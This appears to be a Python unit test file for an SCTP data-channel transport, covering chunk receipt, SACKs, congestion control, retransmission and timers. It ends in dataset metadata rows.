self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
def test_receive_data(self):
client = RTCSctpTransport(self.client_transport)
client._last_received_tsn = 0
# receive chunk
chunk = DataChunk(flags=(SCTP_DATA_FIRST_FRAG | SCTP_DATA_LAST_FRAG))
chunk.user_data = b'foo'
chunk.tsn = 1
run(client._receive_chunk(chunk))
self.assertEqual(client._sack_needed, True)
self.assertEqual(client._sack_duplicates, [])
self.assertEqual(client._sack_misordered, set())
self.assertEqual(client._last_received_tsn, 1)
client._sack_needed = False
# receive chunk again
run(client._receive_chunk(chunk))
self.assertEqual(client._sack_needed, True)
self.assertEqual(client._sack_duplicates, [1])
self.assertEqual(client._sack_misordered, set())
self.assertEqual(client._last_received_tsn, 1)
def test_receive_data_out_of_order(self):
client = RTCSctpTransport(self.client_transport)
client._last_received_tsn = 0
# build chunks
chunks = []
chunk = DataChunk(flags=SCTP_DATA_FIRST_FRAG)
chunk.user_data = b'foo'
chunk.tsn = 1
chunks.append(chunk)
chunk = DataChunk()
chunk.user_data = b'bar'
chunk.tsn = 2
chunks.append(chunk)
chunk = DataChunk(flags=SCTP_DATA_LAST_FRAG)
chunk.user_data = b'baz'
chunk.tsn = 3
chunks.append(chunk)
# receive first chunk
run(client._receive_chunk(chunks[0]))
self.assertEqual(client._sack_needed, True)
self.assertEqual(client._sack_duplicates, [])
self.assertEqual(client._sack_misordered, set())
self.assertEqual(client._last_received_tsn, 1)
client._sack_needed = False
# receive last chunk
run(client._receive_chunk(chunks[2]))
self.assertEqual(client._sack_needed, True)
self.assertEqual(client._sack_duplicates, [])
self.assertEqual(client._sack_misordered, set([3]))
self.assertEqual(client._last_received_tsn, 1)
client._sack_needed = False
# receive middle chunk
run(client._receive_chunk(chunks[1]))
self.assertEqual(client._sack_needed, True)
self.assertEqual(client._sack_duplicates, [])
self.assertEqual(client._sack_misordered, set([]))
self.assertEqual(client._last_received_tsn, 3)
client._sack_needed = False
# receive last chunk again
run(client._receive_chunk(chunks[2]))
self.assertEqual(client._sack_needed, True)
self.assertEqual(client._sack_duplicates, [3])
self.assertEqual(client._sack_misordered, set([]))
self.assertEqual(client._last_received_tsn, 3)
client._sack_needed = False
def test_receive_forward_tsn(self):
received = []
async def fake_receive(*args):
received.append(args)
client = RTCSctpTransport(self.client_transport)
client._last_received_tsn = 101
client._receive = fake_receive
factory = ChunkFactory(tsn=102)
chunks = (
factory.create([b'foo']) +
factory.create([b'baz']) +
factory.create([b'qux']) +
factory.create([b'quux']) +
factory.create([b'corge']) +
factory.create([b'grault']))
# receive chunks with gaps
for i in [0, 2, 3, 5]:
run(client._receive_chunk(chunks[i]))
self.assertEqual(client._sack_needed, True)
self.assertEqual(client._sack_duplicates, [])
self.assertEqual(client._sack_misordered, set([104, 105, 107]))
self.assertEqual(client._last_received_tsn, 102)
self.assertEqual(received, [(456, 123, b'foo')])
received.clear()
client._sack_needed = False
# receive forward tsn
chunk = ForwardTsnChunk()
chunk.cumulative_tsn = 103
chunk.streams = [(456, 1)]
run(client._receive_chunk(chunk))
self.assertEqual(client._sack_needed, True)
self.assertEqual(client._sack_duplicates, [])
self.assertEqual(client._sack_misordered, set([107]))
self.assertEqual(client._last_received_tsn, 105)
self.assertEqual(received, [(456, 123, b'qux'), (456, 123, b'quux')])
received.clear()
client._sack_needed = False
# receive forward tsn again
run(client._receive_chunk(chunk))
self.assertEqual(client._sack_needed, True)
self.assertEqual(client._sack_duplicates, [])
self.assertEqual(client._sack_misordered, set([107]))
self.assertEqual(client._last_received_tsn, 105)
self.assertEqual(received, [])
client._sack_needed = False
# receive chunk
run(client._receive_chunk(chunks[4]))
self.assertEqual(client._sack_needed, True)
self.assertEqual(client._sack_duplicates, [])
self.assertEqual(client._sack_misordered, set())
self.assertEqual(client._last_received_tsn, 107)
self.assertEqual(received, [(456, 123, b'corge'), (456, 123, b'grault')])
received.clear()
client._sack_needed = False
def test_receive_heartbeat(self):
ack = None
async def mock_send_chunk(chunk):
nonlocal ack
ack = chunk
client = RTCSctpTransport(self.client_transport)
client._last_received_tsn = 0
client._remote_port = 5000
client._send_chunk = mock_send_chunk
# receive heartbeat
chunk = HeartbeatChunk()
chunk.params.append((1, b'\x01\x02\x03\x04'))
chunk.tsn = 1
run(client._receive_chunk(chunk))
# check response
self.assertTrue(isinstance(ack, HeartbeatAckChunk))
self.assertEqual(ack.params, [(1, b'\x01\x02\x03\x04')])
def test_receive_sack_discard(self):
client = RTCSctpTransport(self.client_transport)
client._last_received_tsn = 0
# receive sack
sack_point = client._last_sacked_tsn
chunk = SackChunk()
chunk.cumulative_tsn = tsn_minus_one(sack_point)
run(client._receive_chunk(chunk))
# sack point must not changed
self.assertEqual(client._last_sacked_tsn, sack_point)
def test_receive_shutdown(self):
async def mock_send_chunk(chunk):
pass
client = RTCSctpTransport(self.client_transport)
client._last_received_tsn = 0
client._send_chunk = mock_send_chunk
client._set_state(RTCSctpTransport.State.ESTABLISHED)
# receive shutdown
chunk = ShutdownChunk()
chunk.cumulative_tsn = tsn_minus_one(client._last_sacked_tsn)
run(client._receive_chunk(chunk))
self.assertEqual(client._association_state, RTCSctpTransport.State.SHUTDOWN_ACK_SENT)
# receive shutdown complete
chunk = ShutdownCompleteChunk()
run(client._receive_chunk(chunk))
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
def test_mark_received(self):
client = RTCSctpTransport(self.client_transport)
client._last_received_tsn = 0
# receive 1
self.assertFalse(client._mark_received(1))
self.assertEqual(client._last_received_tsn, 1)
self.assertEqual(client._sack_misordered, set())
# receive 3
self.assertFalse(client._mark_received(3))
self.assertEqual(client._last_received_tsn, 1)
self.assertEqual(client._sack_misordered, set([3]))
# receive 4
self.assertFalse(client._mark_received(4))
self.assertEqual(client._last_received_tsn, 1)
self.assertEqual(client._sack_misordered, set([3, 4]))
# receive 6
self.assertFalse(client._mark_received(6))
self.assertEqual(client._last_received_tsn, 1)
self.assertEqual(client._sack_misordered, set([3, 4, 6]))
# receive 2
self.assertFalse(client._mark_received(2))
self.assertEqual(client._last_received_tsn, 4)
self.assertEqual(client._sack_misordered, set([6]))
def test_send_sack(self):
sack = None
async def mock_send_chunk(c):
nonlocal sack
sack = c
client = RTCSctpTransport(self.client_transport)
client._last_received_tsn = 123
client._send_chunk = mock_send_chunk
run(client._send_sack())
self.assertIsNotNone(sack)
self.assertEqual(sack.duplicates, [])
self.assertEqual(sack.gaps, [])
self.assertEqual(sack.cumulative_tsn, 123)
def test_send_sack_with_duplicates(self):
sack = None
async def mock_send_chunk(c):
nonlocal sack
sack = c
client = RTCSctpTransport(self.client_transport)
client._last_received_tsn = 123
client._sack_duplicates = [125, 127]
client._send_chunk = mock_send_chunk
run(client._send_sack())
self.assertIsNotNone(sack)
self.assertEqual(sack.duplicates, [125, 127])
self.assertEqual(sack.gaps, [])
self.assertEqual(sack.cumulative_tsn, 123)
def test_send_sack_with_gaps(self):
sack = None
async def mock_send_chunk(c):
nonlocal sack
sack = c
client = RTCSctpTransport(self.client_transport)
client._last_received_tsn = 12
client._sack_misordered = [14, 15, 17]
client._send_chunk = mock_send_chunk
run(client._send_sack())
self.assertIsNotNone(sack)
self.assertEqual(sack.duplicates, [])
self.assertEqual(sack.gaps, [(2, 3), (5, 5)])
self.assertEqual(sack.cumulative_tsn, 12)
def test_send_data(self):
async def mock_send_chunk(chunk):
pass
client = RTCSctpTransport(self.client_transport)
client._local_tsn = 0
client._send_chunk = mock_send_chunk
# no data
run(client._transmit())
self.assertIsNone(client._t3_handle)
self.assertEqual(outstanding_tsns(client), [])
self.assertEqual(queued_tsns(client), [])
self.assertEqual(client._outbound_stream_seq, {})
# 1 chunk
run(client._send(123, 456, b'M' * USERDATA_MAX_LENGTH))
self.assertIsNotNone(client._t3_handle)
self.assertEqual(outstanding_tsns(client), [0])
self.assertEqual(queued_tsns(client), [])
self.assertEqual(client._outbound_stream_seq, {123: 1})
def test_send_data_unordered(self):
async def mock_send_chunk(chunk):
pass
client = RTCSctpTransport(self.client_transport)
client._local_tsn = 0
client._send_chunk = mock_send_chunk
# 1 chunk
run(client._send(123, 456, b'M' * USERDATA_MAX_LENGTH, ordered=False))
self.assertIsNotNone(client._t3_handle)
self.assertEqual(outstanding_tsns(client), [0])
self.assertEqual(queued_tsns(client), [])
self.assertEqual(client._outbound_stream_seq, {})
def test_send_data_congestion_control(self):
sent_tsns = []
async def mock_send_chunk(chunk):
sent_tsns.append(chunk.tsn)
client = RTCSctpTransport(self.client_transport)
client._cwnd = 4800
client._last_sacked_tsn = 4294967295
client._local_tsn = 0
client._ssthresh = 4800
client._send_chunk = mock_send_chunk
# queue 16 chunks, but cwnd only allows 4
run(client._send(123, 456, b'M' * USERDATA_MAX_LENGTH * 16))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 4800)
self.assertEqual(sent_tsns, [0, 1, 2, 3])
self.assertEqual(outstanding_tsns(client), [0, 1, 2, 3])
self.assertEqual(queued_tsns(client), [4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15])
# SACK comes in acknowledging 2 chunks
sack = SackChunk()
sack.cumulative_tsn = 1
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 6000)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 6000)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6])
self.assertEqual(outstanding_tsns(client), [2, 3, 4, 5, 6])
self.assertEqual(queued_tsns(client), [7, 8, 9, 10, 11, 12, 13, 14, 15])
# SACK comes in acknowledging 2 more chunks
sack = SackChunk()
sack.cumulative_tsn = 3
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 6000)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 6000)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7, 8])
self.assertEqual(outstanding_tsns(client), [4, 5, 6, 7, 8])
self.assertEqual(queued_tsns(client), [9, 10, 11, 12, 13, 14, 15])
# SACK comes in acknowledging 2 more chunks
sack = SackChunk()
sack.cumulative_tsn = 5
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 6000)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 6000)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
self.assertEqual(outstanding_tsns(client), [6, 7, 8, 9, 10])
self.assertEqual(queued_tsns(client), [11, 12, 13, 14, 15])
# SACK comes in acknowledging 2 more chunks
sack = SackChunk()
sack.cumulative_tsn = 7
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 7200)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 7200)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13])
self.assertEqual(outstanding_tsns(client), [8, 9, 10, 11, 12, 13])
self.assertEqual(queued_tsns(client), [14, 15])
# SACK comes in acknowledging 2 more chunks
sack = SackChunk()
sack.cumulative_tsn = 9
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 7200)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 7200)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15])
self.assertEqual(outstanding_tsns(client), [10, 11, 12, 13, 14, 15])
self.assertEqual(queued_tsns(client), [])
def test_send_data_slow_start(self):
sent_tsns = []
async def mock_send_chunk(chunk):
sent_tsns.append(chunk.tsn)
client = RTCSctpTransport(self.client_transport)
client._last_sacked_tsn = 4294967295
client._local_tsn = 0
client._ssthresh = 131072
client._send_chunk = mock_send_chunk
# queue 8 chunks, but cwnd only allows 3
with self.assertTimerRestarted(client):
run(client._send(123, 456, b'M' * USERDATA_MAX_LENGTH * 8))
self.assertEqual(client._cwnd, 3600)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 3600)
self.assertEqual(sent_tsns, [0, 1, 2])
self.assertEqual(outstanding_tsns(client), [0, 1, 2])
self.assertEqual(queued_tsns(client), [3, 4, 5, 6, 7])
# SACK comes in acknowledging 2 chunks
sack = SackChunk()
sack.cumulative_tsn = 1
with self.assertTimerRestarted(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 4800)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5])
self.assertEqual(outstanding_tsns(client), [2, 3, 4, 5])
self.assertEqual(queued_tsns(client), [6, 7])
# SACK sack comes in acknowledging 2 more chunks
sack = SackChunk()
sack.cumulative_tsn = 3
with self.assertTimerRestarted(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 6000)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 4800)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7])
self.assertEqual(outstanding_tsns(client), [4, 5, 6, 7])
self.assertEqual(queued_tsns(client), [])
# SACK comes in acknowledging 2 more chunks
sack = SackChunk()
sack.cumulative_tsn = 5
with self.assertTimerRestarted(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 6000)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 2400)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7])
self.assertEqual(outstanding_tsns(client), [6, 7])
self.assertEqual(queued_tsns(client), [])
# SACK comes in acknowledging final chunks
sack = SackChunk()
sack.cumulative_tsn = 7
with self.assertTimerStopped(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 6000)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 0)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7])
self.assertEqual(outstanding_tsns(client), [])
self.assertEqual(queued_tsns(client), [])
def test_send_data_with_gap(self):
sent_tsns = []
async def mock_send_chunk(chunk):
sent_tsns.append(chunk.tsn)
client = RTCSctpTransport(self.client_transport)
client._last_sacked_tsn = 4294967295
client._local_tsn = 0
client._ssthresh = 131072
client._send_chunk = mock_send_chunk
# queue 8 chunks, but cwnd only allows 3
with self.assertTimerRestarted(client):
run(client._send(123, 456, b'M' * USERDATA_MAX_LENGTH * 8))
self.assertEqual(client._cwnd, 3600)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 3600)
self.assertEqual(sent_tsns, [0, 1, 2])
self.assertEqual(outstanding_tsns(client), [0, 1, 2])
self.assertEqual(queued_tsns(client), [3, 4, 5, 6, 7])
# SACK comes in acknowledging chunks 0 and 2
sack = SackChunk()
sack.cumulative_tsn = 0
sack.gaps = [(2, 2)] # TSN 1 is missing
with self.assertTimerRestarted(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 4800)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5])
self.assertEqual(outstanding_tsns(client), [1, 2, 3, 4, 5])
self.assertEqual(queued_tsns(client), [6, 7])
# SACK comes in acknowledging chunks 1 and 3
sack = SackChunk()
sack.cumulative_tsn = 3
with self.assertTimerRestarted(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 6000)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 4800)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7])
self.assertEqual(outstanding_tsns(client), [4, 5, 6, 7])
self.assertEqual(queued_tsns(client), [])
# SACK comes in acknowledging 2 more chunks
sack = SackChunk()
sack.cumulative_tsn = 5
with self.assertTimerRestarted(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 6000)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 2400)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7])
self.assertEqual(outstanding_tsns(client), [6, 7])
self.assertEqual(queued_tsns(client), [])
# SACK comes in acknowledging final chunks
sack = SackChunk()
sack.cumulative_tsn = 7
with self.assertTimerStopped(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 6000)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 0)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7])
self.assertEqual(outstanding_tsns(client), [])
self.assertEqual(queued_tsns(client), [])
def test_send_data_with_gap_1_retransmit(self):
sent_tsns = []
async def mock_send_chunk(chunk):
sent_tsns.append(chunk.tsn)
client = RTCSctpTransport(self.client_transport)
client._last_sacked_tsn = 4294967295
client._local_tsn = 0
client._ssthresh = 131072
client._send_chunk = mock_send_chunk
# queue 8 chunks, but cwnd only allows 3
with self.assertTimerRestarted(client):
run(client._send(123, 456, b'M' * USERDATA_MAX_LENGTH * 8))
self.assertEqual(client._cwnd, 3600)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 3600)
self.assertEqual(sent_tsns, [0, 1, 2])
self.assertEqual(outstanding_tsns(client), [0, 1, 2])
self.assertEqual(queued_tsns(client), [3, 4, 5, 6, 7])
# SACK comes in acknowledging chunks 0 and 2
sack = SackChunk()
sack.cumulative_tsn = 0
sack.gaps = [(2, 2)] # TSN 1 is missing
with self.assertTimerRestarted(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 4800)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5])
self.assertEqual(outstanding_tsns(client), [1, 2, 3, 4, 5])
self.assertEqual(queued_tsns(client), [6, 7])
# SACK comes in acknowledging chunks 3 and 4
sack = SackChunk()
sack.cumulative_tsn = 0
sack.gaps = [(2, 4)] # TSN 1 is missing
with self.assertTimerPreserved(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 4800)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7])
self.assertEqual(outstanding_tsns(client), [1, 2, 3, 4, 5, 6, 7])
self.assertEqual(queued_tsns(client), [])
# SACK comes in acknowledging 2 more chunks
sack = SackChunk()
sack.cumulative_tsn = 0
sack.gaps = [(2, 6)] # TSN 1 is missing
with self.assertTimerRestarted(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, 7)
self.assertEqual(client._flight_size, 2400)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7, 1])
self.assertEqual(outstanding_tsns(client), [1, 2, 3, 4, 5, 6, 7])
self.assertEqual(queued_tsns(client), [])
# SACK comes in acknowledging final chunks
sack = SackChunk()
sack.cumulative_tsn = 7
with self.assertTimerStopped(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 0)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7, 1])
self.assertEqual(outstanding_tsns(client), [])
self.assertEqual(queued_tsns(client), [])
def test_send_data_with_gap_2_retransmit(self):
sent_tsns = []
async def mock_send_chunk(chunk):
sent_tsns.append(chunk.tsn)
client = RTCSctpTransport(self.client_transport)
client._last_sacked_tsn = 4294967295
client._local_tsn = 0
client._ssthresh = 131072
client._send_chunk = mock_send_chunk
# queue 8 chunks, but cwnd only allows 3
with self.assertTimerRestarted(client):
run(client._send(123, 456, b'M' * USERDATA_MAX_LENGTH * 8))
self.assertEqual(client._cwnd, 3600)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 3600)
self.assertEqual(sent_tsns, [0, 1, 2])
self.assertEqual(outstanding_tsns(client), [0, 1, 2])
self.assertEqual(queued_tsns(client), [3, 4, 5, 6, 7])
# SACK comes in acknowledging chunk 2
sack = SackChunk()
sack.cumulative_tsn = 4294967295
sack.gaps = [(3, 3)] # TSN 0 and 1 are missing
with self.assertTimerPreserved(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 3600)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 3600)
self.assertEqual(sent_tsns, [0, 1, 2, 3])
self.assertEqual(outstanding_tsns(client), [0, 1, 2, 3])
self.assertEqual(queued_tsns(client), [4, 5, 6, 7])
# SACK comes in acknowledging chunk 3
sack = SackChunk()
sack.cumulative_tsn = 4294967295
sack.gaps = [(3, 4)] # TSN 0 and 1 are missing
with self.assertTimerPreserved(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 3600)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 3600)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4])
self.assertEqual(outstanding_tsns(client), [0, 1, 2, 3, 4])
self.assertEqual(queued_tsns(client), [5, 6, 7])
# SACK comes in acknowledging chunk 4
sack = SackChunk()
sack.cumulative_tsn = 4294967295
sack.gaps = [(3, 5)] # TSN 0 and 1 are missing
with self.assertTimerRestarted(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, 4)
self.assertEqual(client._flight_size, 2400)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 0, 1])
self.assertEqual(outstanding_tsns(client), [0, 1, 2, 3, 4])
self.assertEqual(queued_tsns(client), [5, 6, 7])
# SACK comes in acknowledging all chunks up to 4
sack = SackChunk()
sack.cumulative_tsn = 4
with self.assertTimerRestarted(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 3600)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 0, 1, 5, 6, 7])
self.assertEqual(outstanding_tsns(client), [5, 6, 7])
self.assertEqual(queued_tsns(client), [])
# SACK comes in acknowledging final chunks
sack = SackChunk()
sack.cumulative_tsn = 7
with self.assertTimerStopped(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 0)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 0, 1, 5, 6, 7])
self.assertEqual(outstanding_tsns(client), [])
self.assertEqual(queued_tsns(client), [])
def test_send_data_with_gap_3_retransmit(self):
sent_tsns = []
async def mock_send_chunk(chunk):
sent_tsns.append(chunk.tsn)
client = RTCSctpTransport(self.client_transport)
client._last_sacked_tsn = 4294967295
client._local_tsn = 0
client._ssthresh = 131072
client._send_chunk = mock_send_chunk
# queue 8 chunks, but cwnd only allows 3
with self.assertTimerRestarted(client):
run(client._send(123, 456, b'M' * USERDATA_MAX_LENGTH * 8))
self.assertEqual(client._cwnd, 3600)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 3600)
self.assertEqual(sent_tsns, [0, 1, 2])
self.assertEqual(outstanding_tsns(client), [0, 1, 2])
self.assertEqual(queued_tsns(client), [3, 4, 5, 6, 7])
# SACK comes in acknowledging chunks 0 and 1
sack = SackChunk()
sack.cumulative_tsn = 1
with self.assertTimerRestarted(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 4800)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5])
self.assertEqual(outstanding_tsns(client), [2, 3, 4, 5])
self.assertEqual(queued_tsns(client), [6, 7])
# SACK comes in acknowledging chunk 5
sack = SackChunk()
sack.cumulative_tsn = 1
sack.gaps = [(4, 4)] # TSN 2, 3 and 4 are missing
with self.assertTimerPreserved(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 4800)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6])
self.assertEqual(outstanding_tsns(client), [2, 3, 4, 5, 6])
self.assertEqual(queued_tsns(client), [7])
# SACK comes in acknowledging chunk 6
sack = SackChunk()
sack.cumulative_tsn = 1
sack.gaps = [(4, 5)] # TSN 2, 3 and 4 are missing
with self.assertTimerPreserved(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 4800)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7])
self.assertEqual(outstanding_tsns(client), [2, 3, 4, 5, 6, 7])
self.assertEqual(queued_tsns(client), [])
# artificially raise flight size to hit cwnd
client._flight_size += 2400
# SACK comes in acknowledging chunk 7
sack = SackChunk()
sack.cumulative_tsn = 1
sack.gaps = [(4, 6)] # TSN 2, 3 and 4 are missing
with self.assertTimerRestarted(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, 7)
self.assertEqual(client._flight_size, 4800)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7, 2, 3])
self.assertEqual(outstanding_tsns(client), [2, 3, 4, 5, 6, 7])
self.assertEqual(queued_tsns(client), [])
# SACK comes in acknowledging all chunks up to 3, and 5, 6, 7
sack = SackChunk()
sack.cumulative_tsn = 3
sack.gaps = [(2, 4)] # TSN 4 is missing
with self.assertTimerRestarted(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, 7)
self.assertEqual(client._flight_size, 3600)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7, 2, 3, 4])
self.assertEqual(outstanding_tsns(client), [4, 5, 6, 7])
self.assertEqual(queued_tsns(client), [])
# SACK comes in ackowledging all chunks
sack = SackChunk()
sack.cumulative_tsn = 7
with self.assertTimerStopped(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 2400)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7, 2, 3, 4])
self.assertEqual(outstanding_tsns(client), [])
self.assertEqual(queued_tsns(client), [])
def test_t2_expired_when_shutdown_ack_sent(self):
async def mock_send_chunk(chunk):
pass
client = RTCSctpTransport(self.client_transport)
client._last_received_tsn = 0
client._send_chunk = mock_send_chunk
chunk = ShutdownAckChunk()
# fails once
client._set_state(RTCSctpTransport.State.SHUTDOWN_ACK_SENT)
client._t2_start(chunk)
client._t2_expired()
self.assertEqual(client._t2_failures, 1)
self.assertIsNotNone(client._t2_handle)
self.assertEqual(client._association_state, RTCSctpTransport.State.SHUTDOWN_ACK_SENT)
# fails 10 times
client._t2_failures = 9
client._t2_expired()
self.assertEqual(client._t2_failures, 10)
self.assertIsNotNone(client._t2_handle)
self.assertEqual(client._association_state, RTCSctpTransport.State.SHUTDOWN_ACK_SENT)
# fails 11 times
client._t2_expired()
self.assertEqual(client._t2_failures, 11)
self.assertIsNone(client._t2_handle)
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
# let async code complete
run(asyncio.sleep(0))
def test_t3_expired(self):
async def mock_send_chunk(chunk):
pass
async def mock_transmit():
pass
client = RTCSctpTransport(self.client_transport)
client._local_tsn = 0
client._send_chunk = mock_send_chunk
# 1 chunk
run(client._send(123, 456, b'M' * USERDATA_MAX_LENGTH))
self.assertIsNotNone(client._t3_handle)
self.assertEqual(outstanding_tsns(client), [0])
self.assertEqual(queued_tsns(client), [])
# t3 expires
client._transmit = mock_transmit
client._t3_expired()
self.assertIsNone(client._t3_handle)
self.assertEqual(outstanding_tsns(client), [0])
self.assertEqual(queued_tsns(client), [])
for chunk in client._outbound_queue:
self.assertEqual(chunk._retransmit, True)
# let async code complete
run(asyncio.sleep(0))
| 39.11545
| 99
| 0.655519
| 10,450
| 92,156
| 5.569569
| 0.044785
| 0.189684
| 0.088038
| 0.050222
| 0.87686
| 0.852565
| 0.82559
| 0.812601
| 0.794887
| 0.773564
| 0
| 0.03752
| 0.238519
| 92,156
| 2,355
| 100
| 39.132059
| 0.791863
| 0.04947
| 0
| 0.730681
| 0
| 0.00173
| 0.018652
| 0.006023
| 0
| 0
| 0
| 0
| 0.485582
| 1
| 0.051326
| false
| 0.00519
| 0.004037
| 0.001153
| 0.066321
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
43a805b8745987eb4e8b313a599df979d39df016
| 3,086
|
py
|
Python
|
test/unit/test_tracking.py
|
jankytara2/dbt
|
3f4069ab6d4d5b3fc34f8fe785761b5617357b0f
|
[
"Apache-2.0"
] | 1
|
2020-11-18T21:25:53.000Z
|
2020-11-18T21:25:53.000Z
|
test/unit/test_tracking.py
|
azhard/dbt
|
9cd7cbc9e35e5a7c8c4f17a3d113263f4421ab55
|
[
"Apache-2.0"
] | 50
|
2021-11-02T06:20:50.000Z
|
2022-03-31T06:23:16.000Z
|
test/unit/test_tracking.py
|
azhard/dbt
|
9cd7cbc9e35e5a7c8c4f17a3d113263f4421ab55
|
[
